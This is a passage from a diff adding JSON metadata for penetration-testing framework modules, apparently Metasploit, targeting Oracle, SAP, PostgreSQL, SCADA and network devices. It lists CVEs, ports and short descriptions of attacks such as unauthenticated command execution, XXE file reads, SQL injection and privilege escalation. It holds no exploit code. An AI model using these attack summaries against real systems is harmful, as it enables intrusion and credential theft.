"/modules/auxiliary/admin/networking/f5_config.rb", + "is_install_path": true, + "ref_name": "admin/networking/f5_config", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/juniper_config": { + "name": "Juniper Configuration Importer", + "fullname": "auxiliary/admin/networking/juniper_config", + "aliases": [ + "auxiliary/admin/juniper/juniper_config" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module imports a Juniper ScreenOS or JunOS device configuration.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/admin/networking/juniper_config.rb", + "is_install_path": true, + "ref_name": "admin/networking/juniper_config", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "JUNOS", + "description": "Import JunOS Config File" + }, + { + "name": "SCREENOS", + "description": "Import ScreenOS Config File" + } + ] + }, + "auxiliary_admin/networking/mikrotik_config": { + "name": "Mikrotik Configuration Importer", + "fullname": "auxiliary/admin/networking/mikrotik_config", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module imports a Mikrotik device configuration.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/admin/networking/mikrotik_config.rb", + "is_install_path": true, + "ref_name": "admin/networking/mikrotik_config", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "ROUTEROS", + "description": "Import RouterOS Config File" + }, + { + "name": "SWOS", + "description": "Import SwOS Config File" + } + ] + }, + "auxiliary_admin/networking/ubiquiti_config": { + "name": "Ubiquiti Configuration Importer", + "fullname": "auxiliary/admin/networking/ubiquiti_config", + "aliases": [ + "auxiliary/admin/ubiquiti/ubiquiti_config" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module imports an Ubiquiti device configuration.\n The db file within the .unf backup is the data file for\n Unifi. This module can take either the db file or .unf.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-03-23 11:32:45 +0000", + "path": "/modules/auxiliary/admin/networking/ubiquiti_config.rb", + "is_install_path": true, + "ref_name": "admin/networking/ubiquiti_config", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/vyos_config": { + "name": "VyOS Configuration Importer", + "fullname": "auxiliary/admin/networking/vyos_config", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module imports a VyOS device configuration.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/admin/networking/vyos_config.rb", + "is_install_path": true, + "ref_name": "admin/networking/vyos_config", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/officescan/tmlisten_traversal": { + "name": "TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access", + "fullname": "auxiliary/admin/officescan/tmlisten_traversal", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Anshul Pandey ", + "aushack " + ], + "description": "This module tests for directory traversal vulnerability in the UpdateAgent\n function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro\n OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM\n via dot dot sequences in an HTTP request.", + "references": [ + "OSVDB-48730", + "CVE-2008-2439", + "BID-31531", + "URL-http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt" + ], + "platform": "", + "arch": "", + "rport": 26122, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-11-09 03:00:24 +0000", + "path": "/modules/auxiliary/admin/officescan/tmlisten_traversal.rb", + "is_install_path": true, + "ref_name": "admin/officescan/tmlisten_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/ora_ntlm_stealer": { + "name": "Oracle SMB Relay Code Execution", + "fullname": "auxiliary/admin/oracle/ora_ntlm_stealer", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-04-07", + "type": "auxiliary", + "author": [ + "Sh2kerr " + ], + "description": "This module will help you to get Administrator access to OS using an unprivileged\n Oracle database user (you need only CONNECT and RESOURCE privileges).\n To do this you must firstly run smb_sniffer or smb_relay module on your sever.\n Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb\n which will connect to your SMB sever with credentials of Oracle RDBMS.\n So if smb_relay is working, you will get Administrator access to server which\n runs Oracle. If not than you can decrypt HALFLM hash.", + "references": [ + "URL-http://dsecrg.com/pages/pub/show.php?id=17" + ], + "platform": "", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb", + "is_install_path": true, + "ref_name": "admin/oracle/ora_ntlm_stealer", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/oracle_index_privesc": { + "name": "Oracle DB Privilege Escalation via Function-Based Index", + "fullname": "auxiliary/admin/oracle/oracle_index_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-01-21", + "type": "auxiliary", + "author": [ + "David Litchfield", + "Moshe Kaplan" + ], + "description": "This module will escalate an Oracle DB user to DBA by creating a\n function-based index on a table owned by a more-privileged user.\n Credits to David Litchfield for publishing the technique.", + "references": [ + "URL-http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf" + ], + "platform": "", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/oracle/oracle_index_privesc.rb", + "is_install_path": true, + "ref_name": "admin/oracle/oracle_index_privesc", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/oracle_login": { + "name": "Oracle Account Discovery", + "fullname": "auxiliary/admin/oracle/oracle_login", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-11-20", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module uses a list of well known default authentication credentials\n to discover easily guessed accounts.", + "references": [ + "URL-http://www.petefinnigan.com/default/oracle_default_passwords.csv", + "URL-https://seclists.org/fulldisclosure/2009/Oct/261" + ], + "platform": "", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/oracle/oracle_login.rb", + "is_install_path": true, + "ref_name": "admin/oracle/oracle_login", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/oracle_sql": { + "name": "Oracle SQL Generic Query", + "fullname": "auxiliary/admin/oracle/oracle_sql", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-12-07", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module allows for simple SQL statements to be executed\n against an Oracle instance given the appropriate credentials\n and sid.", + "references": [ + "URL-http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/" + ], + "platform": "", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/oracle/oracle_sql.rb", + "is_install_path": true, + "ref_name": "admin/oracle/oracle_sql", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/oraenum": { + "name": "Oracle Database Enumeration", + "fullname": "auxiliary/admin/oracle/oraenum", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Carlos Perez " + ], + "description": "This module provides a simple way to scan an Oracle database server\n for configuration parameters that may be useful during a penetration\n test. Valid database credentials must be provided for this module to\n run.", + "references": [], + "platform": "", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/oracle/oraenum.rb", + "is_install_path": true, + "ref_name": "admin/oracle/oraenum", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/osb_execqr": { + "name": "Oracle Secure Backup exec_qr() Command Injection Vulnerability", + "fullname": "auxiliary/admin/oracle/osb_execqr", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-01-14", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module exploits a command injection vulnerability in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2.", + "references": [ + "CVE-2008-5448", + "OSVDB-51342", + "URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html", + "ZDI-09-003" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/oracle/osb_execqr.rb", + "is_install_path": true, + "ref_name": "admin/oracle/osb_execqr", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/osb_execqr2": { + "name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability", + "fullname": "auxiliary/admin/oracle/osb_execqr2", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-08-18", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module exploits an authentication bypass vulnerability\n in login.php in order to execute arbitrary code via a command injection\n vulnerability in property_box.php. This module was tested\n against Oracle Secure Backup version 10.3.0.1.0 (Win32).", + "references": [ + "CVE-2009-1977", + "OSVDB-55903", + "CVE-2009-1978", + "OSVDB-55904", + "ZDI-09-058", + "ZDI-09-059" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/oracle/osb_execqr2.rb", + "is_install_path": true, + "ref_name": "admin/oracle/osb_execqr2", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/osb_execqr3": { + "name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability", + "fullname": "auxiliary/admin/oracle/osb_execqr3", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-07-13", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module exploits an authentication bypass vulnerability\n in login.php in order to execute arbitrary code via a command injection\n vulnerability in property_box.php. This module was tested\n against Oracle Secure Backup version 10.3.0.1.0 (Win32).", + "references": [ + "CVE-2010-0904", + "OSVDB-66338", + "ZDI-10-118" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/oracle/osb_execqr3.rb", + "is_install_path": true, + "ref_name": "admin/oracle/osb_execqr3", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/post_exploitation/win32exec": { + "name": "Oracle Java execCommand (Win32)", + "fullname": "auxiliary/admin/oracle/post_exploitation/win32exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-12-07", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module will create a java class which enables the execution of OS commands.", + "references": [ + "URL-http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/" + ], + "platform": "", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb", + "is_install_path": true, + "ref_name": "admin/oracle/post_exploitation/win32exec", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/post_exploitation/win32upload": { + "name": "Oracle URL Download", + "fullname": "auxiliary/admin/oracle/post_exploitation/win32upload", + "aliases": [], + "rank": 300, + "disclosure_date": "2005-02-10", + "type": "auxiliary", + "author": [ + "CG " + ], + "description": "This module will create a java class which enables the download\n of a binary from a webserver to the oracle filesystem.", + "references": [ + "URL-http://www.argeniss.com/research/oraclesqlinj.zip" + ], + "platform": "", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb", + "is_install_path": true, + "ref_name": "admin/oracle/post_exploitation/win32upload", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/sid_brute": { + "name": "Oracle TNS Listener SID Brute Forcer", + "fullname": "auxiliary/admin/oracle/sid_brute", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-01-07", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module simply attempts to discover the protected SID.", + "references": [ + "URL-http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/", + "URL-http://www.red-database-security.com/scripts/sid.txt" + ], + "platform": "", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/oracle/sid_brute.rb", + "is_install_path": true, + "ref_name": "admin/oracle/sid_brute", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/tnscmd": { + "name": "Oracle TNS Listener Command Issuer", + "fullname": "auxiliary/admin/oracle/tnscmd", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-02-01", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module allows for the sending of arbitrary TNS commands in order\n to gather information.\n Inspired from tnscmd.pl from www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd", + "references": [], + "platform": "", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/oracle/tnscmd.rb", + "is_install_path": true, + "ref_name": "admin/oracle/tnscmd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/pop2/uw_fileretrieval": { + "name": "UoW pop2d Remote File Retrieval Vulnerability", + "fullname": "auxiliary/admin/pop2/uw_fileretrieval", + "aliases": [], + "rank": 300, + "disclosure_date": "2000-07-14", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module exploits a vulnerability in the FOLD command of the\n University of Washington ipop2d service. By specifying an arbitrary\n folder name it is possible to retrieve any file which is world or group\n readable by the user ID of the POP account. This vulnerability can only\n be exploited with a valid username and password. The From address is\n the file owner.", + "references": [ + "OSVDB-368", + "BID-1484" + ], + "platform": "", + "arch": "", + "rport": 109, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/pop2/uw_fileretrieval.rb", + "is_install_path": true, + "ref_name": "admin/pop2/uw_fileretrieval", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/postgres/postgres_readfile": { + "name": "PostgreSQL Server Generic Query", + "fullname": "auxiliary/admin/postgres/postgres_readfile", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "todb " + ], + "description": "This module imports a file local on the PostgreSQL Server into a\n temporary table, reads it, and then drops the temporary table.\n It requires PostgreSQL credentials with table CREATE privileges\n as well as read privileges to the target file.", + "references": [], + "platform": "", + "arch": "", + "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], + "targets": null, + "mod_time": "2024-02-19 10:57:53 +0000", + "path": "/modules/auxiliary/admin/postgres/postgres_readfile.rb", + "is_install_path": true, + "ref_name": "admin/postgres/postgres_readfile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "postgresql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/postgres/postgres_sql": { + "name": "PostgreSQL Server Generic Query", + "fullname": "auxiliary/admin/postgres/postgres_sql", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "todb " + ], + "description": "This module will allow for simple SQL statements to be executed against a\n PostgreSQL instance given the appropriate credentials.", + "references": [ + "URL-https://www.postgresql.org" + ], + "platform": "", + "arch": "", + "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], + "targets": null, + "mod_time": "2024-03-05 17:49:13 +0000", + "path": "/modules/auxiliary/admin/postgres/postgres_sql.rb", + "is_install_path": true, + "ref_name": "admin/postgres/postgres_sql", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "postgresql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/registry_security_descriptor": { + "name": "Windows Registry Security Descriptor Utility", + "fullname": "auxiliary/admin/registry_security_descriptor", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Christophe De La Fuente" + ], + "description": "Read or write a Windows registry security descriptor remotely.\n\n In READ mode, the `FILE` option can be set to specify where the\n security descriptor should be written to.\n\n The following format is used:\n ```\n key: \n security_info: \n sd: \n ```\n\n In WRITE mode, the `FILE` option can be used to specify the information\n needed to write the security descriptor to the remote registry. The file must\n follow the same format as described above.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2024-12-16 14:55:10 +0000", + "path": "/modules/auxiliary/admin/registry_security_descriptor.rb", + "is_install_path": true, + "ref_name": "admin/registry_security_descriptor", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "config-changes" + ] + }, + "session_types": [ + "smb" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "READ", + "description": "Read a Windows registry security descriptor" + }, + { + "name": "WRITE", + "description": "Write a Windows registry security descriptor" + } + ] + }, + "auxiliary_admin/sap/cve_2020_6207_solman_rce": { + "name": "SAP Solution Manager remote unauthorized OS commands execution", + "fullname": "auxiliary/admin/sap/cve_2020_6207_solman_rce", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-10-03", + "type": "auxiliary", + "author": [ + "Yvan Genuer", + "Pablo Artuso", + "Dmitry Chastuhin", + "Vladimir Ivanov" + ], + "description": "This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of\n SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication\n checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents,\n send HTTP request (SSRF), and execute OS commands on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8.\n\n Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute OS commands from the agent connected\n to SolMan as a user from which the SMDAgent service starts, usually the daaadm.", + "references": [ + "CVE-2020-6207", + "URL-https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf", + "URL-https://github.com/chipik/SAP_EEM_CVE-2020-6207" + ], + "platform": "", + "arch": "", + "rport": 50000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb", + "is_install_path": true, + "ref_name": "admin/sap/cve_2020_6207_solman_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes", + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "EXEC", + "description": "Exec OS command on connected agent" + }, + { + "name": "LIST", + "description": "List connected agents" + }, + { + "name": "SECSTORE", + "description": "Get file with SolMan credentials from connected agent" + }, + { + "name": "SSRF", + "description": "Send SSRF from connected agent" + } + ] + }, + "auxiliary_admin/sap/cve_2020_6287_ws_add_user": { + "name": "SAP Unauthenticated WebService User Creation", + "fullname": "auxiliary/admin/sap/cve_2020_6287_ws_add_user", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-07-14", + "type": "auxiliary", + "author": [ + "Pablo Artuso", + "Dmitry Chastuhin", + "Spencer McIntyre" + ], + "description": "This module leverages an unauthenticated web service to submit a job which will create a user with a specified\n role. The job involves running a wizard. After the necessary action is taken, the job is canceled to avoid\n unnecessary system changes.", + "references": [ + "CVE-2020-6287", + "URL-https://github.com/chipik/SAP_RECON", + "URL-https://www.onapsis.com/recon-sap-cyber-security-vulnerability", + "URL-https://us-cert.cisa.gov/ncas/alerts/aa20-195a" + ], + "platform": "", + "arch": "", + "rport": 50000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb", + "is_install_path": true, + "ref_name": "admin/sap/cve_2020_6287_ws_add_user", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "AKA": [ + "RECON" + ], + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes", + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "ADD", + "description": "Add the specified user" + }, + { + "name": "REMOVE", + "description": "Remove the specified user" + } + ] + }, + "auxiliary_admin/sap/sap_configservlet_exec_noauth": { + "name": "SAP ConfigServlet OS Command Execution", + "fullname": "auxiliary/admin/sap/sap_configservlet_exec_noauth", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-11-01", + "type": "auxiliary", + "author": [ + "Dmitry Chastuhin", + "Andras Kabai" + ], + "description": "This module allows execution of operating system commands through the SAP\n ConfigServlet without any authentication.", + "references": [ + "OSVDB-92704", + "EDB-24963", + "URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf" + ], + "platform": "", + "arch": "", + "rport": 50000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb", + "is_install_path": true, + "ref_name": "admin/sap/sap_configservlet_exec_noauth", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/sap/sap_igs_xmlchart_xxe": { + "name": "SAP Internet Graphics Server (IGS) XMLCHART XXE", + "fullname": "auxiliary/admin/sap/sap_igs_xmlchart_xxe", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-03-14", + "type": "auxiliary", + "author": [ + "Yvan Genuer", + "Vladimir Ivanov" + ], + "description": "This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page\n of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These\n vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when\n submitting a POST request to the XMLCHART page to generate a new chart.\n\n Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user\n from which the IGS service is started, which will typically be the SAP admin user. Alternatively attackers\n can also abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable\n SAP IGS server.", + "references": [ + "CVE-2018-2392", + "CVE-2018-2393", + "URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf" + ], + "platform": "", + "arch": "", + "rport": 40080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb", + "is_install_path": true, + "ref_name": "admin/sap/sap_igs_xmlchart_xxe", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "DOS", + "description": "Denial Of Service" + }, + { + "name": "READ", + "description": "Remote file read" + } + ] + }, + "auxiliary_admin/sap/sap_mgmt_con_osexec": { + "name": "SAP Management Console OSExecute", + "fullname": "auxiliary/admin/sap/sap_mgmt_con_osexec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Chris John Riley" + ], + "description": "This module allows execution of operating system commands through the SAP\n Management Console SOAP Interface. A valid username and password must be\n provided.", + "references": [ + "URL-http://blog.c22.cc" + ], + "platform": "", + "arch": "", + "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb", + "is_install_path": true, + "ref_name": "admin/sap/sap_mgmt_con_osexec", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/advantech_webaccess_dbvisitor_sqli": { + "name": "Advantech WebAccess DBVisitor.dll ChartThemeConfig SQL Injection", + "fullname": "auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-04-08", + "type": "auxiliary", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The\n vulnerability exists in the DBVisitor.dll component, and can be abused through malicious\n requests to the ChartThemeConfig web service. This module can be used to extract the site\n and project usernames and hashes.", + "references": [ + "CVE-2014-0763", + "ZDI-14-077", + "OSVDB-105572", + "BID-66740", + "URL-https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb", + "is_install_path": true, + "ref_name": "admin/scada/advantech_webaccess_dbvisitor_sqli", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/ge_proficy_substitute_traversal": { + "name": "GE Proficy Cimplicity WebView substitute.bcl Directory Traversal", + "fullname": "auxiliary/admin/scada/ge_proficy_substitute_traversal", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-01-22", + "type": "auxiliary", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the\n gefebt.exe component used by the 